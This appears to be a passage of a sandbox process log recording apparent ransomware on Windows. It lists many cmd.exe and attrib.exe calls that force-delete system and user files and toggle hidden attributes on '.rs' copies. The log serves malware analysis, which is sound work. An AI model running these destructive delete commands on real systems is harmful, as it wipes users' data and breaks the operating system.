C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.bk""
3⤵
PID:7684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll""
3⤵
PID:7668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""
3⤵
PID:7656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico""
3⤵
PID:7644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
3⤵
PID:7616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_32\indexb.dat""
3⤵
PID:7564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\assembly\NativeImages_v2.0.50727_32\indexb.dat.rs""
3⤵
PID:7556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Links\desktop.ini""
3⤵
PID:7536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Links\desktop.ini.rs""
3⤵
PID:7528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1E11E75149C17A93653DA7DC0B8CF53F_8F360D4ACE5D7CEC2FF3EF4F09601250""
3⤵
PID:7440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe""
3⤵
PID:7420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Crypto\SystemKeys\12780705e4414c0ef1598a1e2c479c2e_cc51e87d-bda7-4ef7-80cf-c431fec6b805""
3⤵
PID:7408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini""
3⤵
PID:7384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\assembly\NativeImages_v2.0.50727_32\indexb.dat""
3⤵
PID:7352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Links\desktop.ini""
3⤵
PID:7320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\update-config.json""
3⤵
PID:7260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\windows.uif_ondemand.xml.inbox""
3⤵
PID:7008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1E11E75149C17A93653DA7DC0B8CF53F_8F360D4ACE5D7CEC2FF3EF4F09601250""
3⤵
PID:6236

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\customizations.xml"
4⤵
- Views/modifies file attributes
PID:17488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Favorites\Bing.url""
3⤵
PID:6192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm""
3⤵
PID:6408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
3⤵
PID:6968

C:\Windows\system32\attrib.exe
attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
4⤵
PID:14292

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files\Common Files\microsoft shared\ink\Content.xml"
4⤵
PID:4596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\DeploymentConfig.0.xml""
3⤵
PID:6960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages""
3⤵
PID:6856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
3⤵
PID:6796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\Products.txt""
3⤵
PID:6728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp""
3⤵
PID:6428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst""
3⤵
PID:6332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\ApproveRequest.3gp2""
3⤵
PID:6316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Desktop\ClearExpand.TS""
3⤵
PID:6304

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico"
4⤵
PID:6796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Adobe\Color\ACECache11.lst""
3⤵
PID:6240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Contacts\desktop.ini""
3⤵
PID:6212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bcastdvr\broadcastpause720.h264""
3⤵
PID:5284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bfsvc.exe""
3⤵
PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\appcompat\Programs\Amcache.hve""
3⤵
PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Oracle\Java\java.settings.cfg""
3⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""
3⤵
PID:10716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""
3⤵
PID:11048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe""
3⤵
PID:10004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll""
3⤵
PID:5716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\DeploymentConfig.0.xml""
3⤵
PID:6280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini""
3⤵
PID:5176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.rs""
3⤵
PID:8236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Oracle\Java\javapath\java.exe""
3⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
3⤵
PID:9064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.exe""
3⤵
PID:5796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Network\Downloader\edb.chk""
3⤵
PID:11016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe""
3⤵
PID:6720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\AppPatch\AcLayers.dll""
3⤵
PID:12360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""
3⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp""
3⤵
PID:9364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk""
3⤵
PID:10612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft-Wfa2436cc#\6f3cde160ba5e97255cd8b9c5b9b96ac\Microsoft-Windows-HomeGroupDiagnostic.Interop.ni.dll""
3⤵
PID:11292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk""
3⤵
PID:11216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe""
3⤵
PID:7104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc""
3⤵
PID:8864

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc"
4⤵
PID:18036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
3⤵
PID:7752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\srmlib\1.0.0.0__31bf3856ad364e35\srmlib.dll""
3⤵
PID:8056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""
3⤵
PID:12964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini.rs""
3⤵
PID:10116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe""
3⤵
PID:12836

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe"
4⤵
PID:17616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll""
3⤵
PID:12784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\CopyAssert.mpa""
3⤵
PID:5136

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp"
4⤵
PID:5332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb""
3⤵
PID:5528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\InkDiv.dll""
3⤵
PID:13260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\InkDiv.dll.rs""
3⤵
PID:13248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
3⤵
PID:13240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\appcompat\Programs\Amcache.hve.LOG1""
3⤵
PID:13140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\desktop.ini""
3⤵
PID:13132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui""
3⤵
PID:13124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\desktop.ini.rs""
3⤵
PID:13088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
3⤵
PID:13080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui.rs""
3⤵
PID:13064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc.rs""
3⤵
PID:13052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\appcompat\Programs\Amcache.hve.LOG1""
3⤵
PID:13044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe.rs""
3⤵
PID:13036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\update-config.json""
3⤵
PID:12516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\update-config.json.rs""
3⤵
PID:12508

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\All Users\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\customizations.xml"
4⤵
PID:22144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\d9fdd7d92bd22a03bac6534f017c6fcd\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll""
3⤵
PID:12468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""
3⤵
PID:12460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
3⤵
PID:12448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml""
3⤵
PID:12384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini""
3⤵
PID:12320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk""
3⤵
PID:12312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft-W62ccfac7#\250d562e59b38b94ae1416b6a7490c20\Microsoft-Windows-HomeGroupDiagnostic.NetListMgr.Interop.ni.dll""
3⤵
PID:12296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe""
3⤵
PID:10332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.rs""
3⤵
PID:10368

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Windows\en-US\bfsvc.exe.mui"
4⤵
PID:7820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini""
3⤵
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\AppPatch\AcGenral.dll""
3⤵
PID:9468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\AppPatch\AcGenral.dll.rs""
3⤵
PID:11988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\MF\Pending.GRL""
3⤵
PID:5500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\micaut.dll.mui""
3⤵
PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\InkObj.dll.mui""
3⤵
PID:6296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\InkObj.dll.mui.rs""
3⤵
PID:11144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
3⤵
PID:1904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.rs""
3⤵
PID:6384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Contacts\desktop.ini""
3⤵
PID:10140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini""
3⤵
PID:2396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Contacts\desktop.ini.rs""
3⤵
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bcastdvr\broadcastpause720.h264.rs""
3⤵
PID:7176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1E11E75149C17A93653DA7DC0B8CF53F_8F360D4ACE5D7CEC2FF3EF4F09601250.rs""
3⤵
PID:14816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\customizations.xml""
3⤵
PID:16060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc""
3⤵
PID:7608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll""
3⤵
PID:11576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\assembly\NativeImages_v2.0.50727_64\indexd.dat.rs""
3⤵
PID:8860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi""
3⤵
PID:10172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\assembly\NativeImages_v2.0.50727_64\indexd.dat""
3⤵
PID:11664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll""
3⤵
PID:11708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll.rs""
3⤵
PID:11696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Boot\BCD.LOG2""
3⤵
PID:15376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Boot\BCD.LOG2""
3⤵
PID:10176

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Boot\BCD.LOG2"
4⤵
PID:14388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.dll""
3⤵
PID:9028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll""
3⤵
PID:5780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\customizations.xml""
3⤵
PID:7072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\08803c8aa996354792c73ef12405560e\Microsoft.KeyDistributionService.Cmdlets.ni.dll""
3⤵
PID:12160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\customizations.xml""
3⤵
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE""
3⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll""
3⤵
PID:11840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\add88fa03f6bf0e2d67b8d9ba4a9032f\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll""
3⤵
PID:15392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\DeploymentConfiguration.xml""
3⤵
PID:9020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui""
3⤵
PID:4616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
3⤵
PID:6464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\en-us.16\MasterDescriptor.en-us.xml""
3⤵
PID:11068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\6530b90ec78334ab182e96ba215b7dc0\Microsoft.Isam.Esent.Interop.ni.dll""
3⤵
PID:5240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\7F90D34A-6846-4B37-9E6C-DA49ECC4DACB\en-us.16\MasterDescriptor.en-us.xml""
3⤵
PID:5364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\GoogleUpdateSetup.exe""
3⤵
PID:7952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\InkObj.dll""
3⤵
PID:10484

C:\Windows\system32\attrib.exe
attrib -h "C:\Windows\Downloaded Program Files\desktop.ini"
4⤵
PID:7708

C:\Windows\system32\attrib.exe
attrib +h "C:\Program Files (x86)\Common Files\System\ado\msader15.dll"
5⤵
PID:20868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi""
3⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE""
3⤵
PID:15148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll""
3⤵
PID:15244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log""
3⤵
PID:13408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk""
3⤵
PID:16000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""
3⤵
PID:15992

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini"
4⤵
PID:9104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini.rs""
3⤵
PID:15984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Desktop\desktop.ini.rs""
3⤵
PID:11196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Desktop\desktop.ini""
3⤵
PID:8220

C:\Windows\system32\attrib.exe
attrib -h -r -s "C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx"
4⤵
PID:14808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v2.0.50727_64\indexd.dat""
3⤵
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi""
3⤵
PID:12000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll""
3⤵
PID:5972

C:\Windows\system32\cmd.exe
